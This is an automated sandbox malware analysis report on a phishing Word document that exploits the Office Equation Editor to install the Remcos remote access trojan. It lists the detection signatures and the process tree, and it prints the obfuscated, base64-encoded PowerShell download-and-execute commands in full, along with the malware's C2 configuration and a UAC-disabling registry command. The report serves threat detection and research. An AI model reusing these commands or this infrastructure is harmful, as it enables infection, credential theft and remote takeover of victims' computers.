Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AMG Cargo Logistic.docx

Overview

General Information

Sample name:AMG Cargo Logistic.docx
Analysis ID:1522765
MD5:cde646bbf76aa0cb430f71ec2408b4bd
SHA1:40fbea905916fc49bfcaf203b3b15e78d9053df5
SHA256:a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3272 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3744 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3816 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 4076 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2736 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1240 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1692 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro:6845:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPF38I", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\notpad0\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x1d84:$obj2: \objdata
    • 0x1d9a:$obj3: \objupdate
    • 0x1d5f:$obj6: \objlink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x1d84:$obj2: \objdata
    • 0x1d9a:$obj3: \objupdate
    • 0x1d5f:$obj6: \objlink

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              13.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                13.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  13.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4b8:$a1: Remcos restarted by watchdog!
                  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                  13.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6657c:$str_b2: Executing file:
                  • 0x675fc:$str_b3: GetDirectListeningPort
                  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67128:$str_b7: \update.vbs
                  • 0x665a4:$str_b9: Downloaded file:
                  • 0x66590:$str_b10: Downloading file:
                  • 0x66634:$str_b12: Failed to upload file:
                  • 0x675c4:$str_b13: StartForward
                  • 0x675e4:$str_b14: StopForward
                  • 0x67080:$str_b15: fso.DeleteFile "
                  • 0x67014:$str_b16: On Error Resume Next
                  • 0x670b0:$str_b17: fso.DeleteFolder "
                  • 0x66624:$str_b18: Uploaded file:
                  • 0x665e4:$str_b19: Unable to delete:
                  • 0x67048:$str_b20: while fso.FileExists("
                  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 18 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 91.134.96.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3744, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3744, TargetFilename: C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49171, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3744, Protocol: tcp, SourceIp: 91.134.96.177, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, 